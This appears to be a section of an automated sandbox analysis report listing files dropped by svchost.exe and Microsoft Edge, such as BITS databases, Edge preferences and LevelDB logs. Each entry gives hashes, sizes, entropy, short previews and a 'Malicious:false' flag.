                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7263193180573361
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0U:9JZj5MiKNnNhoxuF
                                                                                                                                                                                                                                                                          MD5:F7E3ACBC0F94F1DFE6E88602200B117F
                                                                                                                                                                                                                                                                          SHA1:450365F994F4DFAA2E86530EFFEBAD8A20A701FC
                                                                                                                                                                                                                                                                          SHA-256:CEF9E22FF9074C467B7025DBAEF941419D5D4A7DDEDC626E7213D78752C28833
                                                                                                                                                                                                                                                                          SHA-512:5C18E4C1D0C08BC2049E34639622301ABAF4F84A825D8D860A4DDD70264A5E5D0FCFB00BFA07FCF24061FAEC87D6AE5E0BD4F71EAD3D60A6AA2F92B3FA63297B
                                                                                                                                                                                                                                                                          Malicious:false
Preview:[binary data; readable strings: C:\ProgramData\Microsoft\Network\Downloader\ and C:\ProgramData\Microsoft\Network\Downloader\qmgr.db]
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x22d53864, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7556147603326068
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
                                                                                                                                                                                                                                                                          MD5:C0FB32BE96BEF1C29E5B5EA3A966B472
                                                                                                                                                                                                                                                                          SHA1:09FACEBC0F433E99BFC64A635E116A9DF4B66AFF
                                                                                                                                                                                                                                                                          SHA-256:B2185EE4ABC40AB2AE02C5CA0BCC083AC99FDD15E8803414FE4A7DA438B2EF66
                                                                                                                                                                                                                                                                          SHA-512:25335FBD23C89677138EDC7DEB2551B6C269B663B1A2729B91447CF546D75FE1AC0BBB69BEBEADFE1CAB0CF26EF54D458EBB856C64A6909C337185194E9B0DEA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                                          Entropy (8bit):0.07934271039077499
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:cf/lllKYe6Sj0jgGuNaAPaU1lvFtgj/ll/olluxmO+l/SNxOf:c3tKzjjaluNDPaU1Sj//AgmOH
                                                                                                                                                                                                                                                                          MD5:73AA5F8C40EB64AF92524A518C0C3AD2
                                                                                                                                                                                                                                                                          SHA1:C96D7245774422FE42945FD202445B7E15BBA01F
                                                                                                                                                                                                                                                                          SHA-256:5EB151B6DE877E64C04DDF8539437572F7B5B72B02F9A8259B05377A78C370C8
                                                                                                                                                                                                                                                                          SHA-512:417EE9ABE5BFEE778DC35CE86D6D2875535D1D5A60CA91C78B858841B6A29CD922381F2F55380EF501E6524E85431FC99440969D7656D8A238EC0BA664AF2F80
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44894
                                                                                                                                                                                                                                                                          Entropy (8bit):6.095147494967383
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWJji1zNtiATNfsUrtE3PF5DKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynku4KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:D93804E0EF24300DB595C46CC2AE72EF
                                                                                                                                                                                                                                                                          SHA1:6A151B2108CA5A8F220BE9BC98EE0087BD634539
                                                                                                                                                                                                                                                                          SHA-256:914D6AFBCA213374B024480FF2E538DADE20E6ED1231A0C89CA2F7E6D4936944
                                                                                                                                                                                                                                                                          SHA-512:49E7CB7D78421093157802FF539D813E6D7B819BDDA6F6AB8A363C18E496D70F0C36110A5E6A8C98611D82CD20D05447CDF6D196444FDCC7C8185AC993A39E71
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44455
                                                                                                                                                                                                                                                                          Entropy (8bit):6.089825674951637
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWbdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5AkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:CC806F2E23F09AA6023A2E5346F5B3B5
                                                                                                                                                                                                                                                                          SHA1:FF9F9E726EB80F676D3FE243EBFAC5DBD48E6789
                                                                                                                                                                                                                                                                          SHA-256:23A9578985A4B4D7049112177BD6B5F7174EE3B51268E6DED5CADAB3E1BDCF1D
                                                                                                                                                                                                                                                                          SHA-512:2A2BD2253545A7E815CCE2AD78E955B78532BDC0A7632864310D61E78BE6766ECF1FDD599D51AEFF124BBFA2603A63F6D3D95521BCD2CBFCC8CFCB84CA8B67EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3293219877026245
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:doVu1bNGc60WJG4umVKwYzOchxEerXhn16q19BgJq:yu1o9umVzYzO076+BgJq
                                                                                                                                                                                                                                                                          MD5:EBEC828413F40DC136B2A5F7F18605FF
                                                                                                                                                                                                                                                                          SHA1:645694C3AEA9892728B347F0DCFDE2BA00BF42FF
                                                                                                                                                                                                                                                                          SHA-256:08FBBA1A51F9A7E0F3D359E9ABFA459723FFD323CE6DD644F23308909DEFD1E8
                                                                                                                                                                                                                                                                          SHA-512:964DFB44D9F5E233E3E1086FBBF0B52E1D318EB1124D4C7A37158BA0BF92E81B79C96CF7BFF3D2D2CA63C8A22C3AE750CF06105B5079AB71DE7DA7ED99736CED
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                          Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                          MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                          SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                          SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                          SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
Malicious:false
Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
Malicious:false
Preview:.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):33
Entropy (8bit):3.5394429593752084
Encrypted:false
Malicious:false
Preview:...m.................DB_VERSION.1

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):311
Entropy (8bit):5.19991781773578
Encrypted:false
Malicious:false
Preview:2024/12/27-01:11:10.313 40c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-01:11:10.329 40c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:modified
Size (bytes):340
Entropy (8bit):5.033853032397704
Encrypted:false
Malicious:false
Preview:2024/12/27-01:11:10.189 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:11:10.193 1e2c Recovering log #3.2024/12/27-01:11:10.202 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):340
Entropy (8bit):5.033853032397704
Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:10.189 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:11:10.193 1e2c Recovering log #3.2024/12/27-01:11:10.202 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):0.46246861730411365
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuHW:TouQq3qh7z3bY2LNW9WMcUvBuH
                                                                                                                                                                                                                                                                          MD5:CFC9886903D5A6AE7BA50ACA3610EC2F
                                                                                                                                                                                                                                                                          SHA1:6820B58448EC3BACB4342438B298C46C0FE7E738
                                                                                                                                                                                                                                                                          SHA-256:233C342982382CB076C4818B565D49821F5150D3424F429BC3E1C05A09A5159C
                                                                                                                                                                                                                                                                          SHA-512:5B7402DFF13CBD68DE058512562300CD413C86D80F275022D0F6A16E3D3C74703A03FA962EC8C8BD5FEF543021419D34D5180A83E3A68FD45B7999428756D624
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):349
                                                                                                                                                                                                                                                                          Entropy (8bit):5.149268109921384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BIyq2PN723oH+TcwtnG2tMsIFUt8UB1Zmw+UXRkwON723oH+TcwtnG2tMsLJ:BtvVaYebn9GFUt8UB1/+UB5OaYebn95J
                                                                                                                                                                                                                                                                          MD5:A26096860C818A35761B17CCF4037961
                                                                                                                                                                                                                                                                          SHA1:9124E292313D6E75E1FF78BE1BE3A5BD598EF4AB
                                                                                                                                                                                                                                                                          SHA-256:E9D58381151DA0A72892A2D4F04153A32A331ABD321CC271241FB78399B59182
                                                                                                                                                                                                                                                                          SHA-512:34D88C2FAF9CEAA21CB1F166370C455A7E7C22D4833DDFD18E8205D2CC55E6CD98AA082A2DBDCFAFC8B433914F6C959D141BAA759048461C05584D8D3050E26A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.993 a14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:11:04.994 a14 Recovering log #3.2024/12/27-01:11:04.994 a14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):315
                                                                                                                                                                                                                                                                          Entropy (8bit):5.095083296422052
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BOhAm3M1N723oH+Tcwtk2WwnvB2KLl3OhhEIq2PN723oH+Tcwtk2WwnvIFUv:BA3saYebkxwnvFLp0EIvVaYebkxwnQF2
                                                                                                                                                                                                                                                                          MD5:2B4B8210762A0209C977C33BDE3B2F2A
                                                                                                                                                                                                                                                                          SHA1:B933A2922D3AB452AD5C6D432A654D47244B6DEF
                                                                                                                                                                                                                                                                          SHA-256:15A3E6DD85B0F8FE7CD389E7AE992A0AAF910AE25BAA44E6BA67FE2913F20FFB
                                                                                                                                                                                                                                                                          SHA-512:70EC114015061A3B613B7A383CC20E5FEFE580BCBDD40C1C1338D916FAD240D51CD24CE774576E3FF46766465C5FE9F569E49F5016EEF824E29982A8AC301FFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:10.187 1a94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-01:11:10.242 1a94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):380
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                          MD5:9FE07A071FDA31327FA322B32FCA0B7E
                                                                                                                                                                                                                                                                          SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
                                                                                                                                                                                                                                                                          SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
                                                                                                                                                                                                                                                                          SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.144980134523914
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHiW3+q2PN723oH+Tcwt8aPrqIFUt8UHyZmw+UHQVhFNVkwON723oH+Tcwt8amLJ:BHiWOvVaYebL3FUt8UHy/+UHgz5OaYeo
                                                                                                                                                                                                                                                                          MD5:F42A822B7104CEF479F08C3F9F9D6E96
                                                                                                                                                                                                                                                                          SHA1:67B9086C0B9421CD515E8335399828FF6DB99BE6
                                                                                                                                                                                                                                                                          SHA-256:21DC40F90E7DD32DDAA7960B9B7930C0CFF3CB1230383B3220273A9B844D36FE
                                                                                                                                                                                                                                                                          SHA-512:F6A7FCED9A3A06BBA87711AC052F3357C584CB489B2A79A2735943A9F598BDAFC18735F958EA948745031615D6B018065EE15971CFD27240A2396FCF3BDE3BE0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.848 1388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:11:04.849 1388 Recovering log #3.2024/12/27-01:11:04.850 1388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1484986706342655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHQds3+q2PN723oH+Tcwt865IFUt8UHQ0qZmw+UHQ0GVkwON723oH+Tcwt86+ULJ:BHcvVaYeb/WFUt8UHO/+UHi5OaYeb/+e
                                                                                                                                                                                                                                                                          MD5:2EFD749BB8FEC298CF6FC992E101A0D3
                                                                                                                                                                                                                                                                          SHA1:A26C840C65FEB9C729E182CC79E83688DE8DD386
                                                                                                                                                                                                                                                                          SHA-256:8E2E735474AFD3624ECD73BD473D44380190F6A88BA8F1E5E06996B908C301F7
                                                                                                                                                                                                                                                                          SHA-512:98C2B608806516C7849D9F439FF8F8C928A14ECDC698FED894382EDB368B38BCE52B8F6DF98F10831744775F79A7FCCC7FA39E9B9ED065A953676990304A8313
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.858 1028 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:11:04.859 1028 Recovering log #3.2024/12/27-01:11:04.859 1028 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1140
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                          MD5:914FD8DC5F9A741C6947E1AB12A9D113
                                                                                                                                                                                                                                                                          SHA1:6529EFE14E7B0BEA47D78B147243096408CDAAE4
                                                                                                                                                                                                                                                                          SHA-256:8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
                                                                                                                                                                                                                                                                          SHA-512:2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.189793351276595
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BQJe/Q+q2PN723oH+Tcwt8NIFUt8UQJe/gZmw+UQSufQVkwON723oH+Tcwt8+eLJ:BQM/VvVaYebpFUt8UQM/g/+UQSGI5OaO
                                                                                                                                                                                                                                                                          MD5:89CEB1759B533D24DFBC40ACF1D9CAFF
                                                                                                                                                                                                                                                                          SHA1:229F157DF1D1B75F666DA1B83EC452B0E157152A
                                                                                                                                                                                                                                                                          SHA-256:038150402E67275FE4E8F8461004B664DA7A454E5586657A0B9369D290AB2D2D
                                                                                                                                                                                                                                                                          SHA-512:B17915A1156925E6BB1709B38BA2A640D4851A53DC6F743A75E230FF01F75E33DF50FA50D46787F7543A350080CC3BC6E3B2336E8CED614EF7DAF43DFE37FE75
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.426 1b98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:11:05.426 1b98 Recovering log #3.2024/12/27-01:11:05.427 1b98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):412
                                                                                                                                                                                                                                                                          Entropy (8bit):5.228792081316709
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:B4KL+vVaYeb8rcHEZrELFUt8Uw/+UALV5OaYeb8rcHEZrEZSJ:m3VaYeb8nZrExg8GOaYeb8nZrEZe
                                                                                                                                                                                                                                                                          MD5:47002C412D4863E770EE4D1ED70A4ABD
                                                                                                                                                                                                                                                                          SHA1:FAF91BDE87AF206334F73598B635EBA01EE1AC5B
                                                                                                                                                                                                                                                                          SHA-256:CFC80E2C61DA8F3F15873B78D574E40373088E4266F3FDAF642A97B2732EA957
                                                                                                                                                                                                                                                                          SHA-512:FB4C52EA8C4899BFEF937170C6CCF6C4B8363C7B3FEF7124DC39B6F48FD02E739C056499F0C22FF660F71E51919A23F81B44481C36DE8270CADA67C04868D784
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:08.670 14ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:11:08.671 14ac Recovering log #3.2024/12/27-01:11:08.671 14ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):337
                                                                                                                                                                                                                                                                          Entropy (8bit):5.162725875759367
                                                                                                                                                                                                                                                                          Encrypted:false
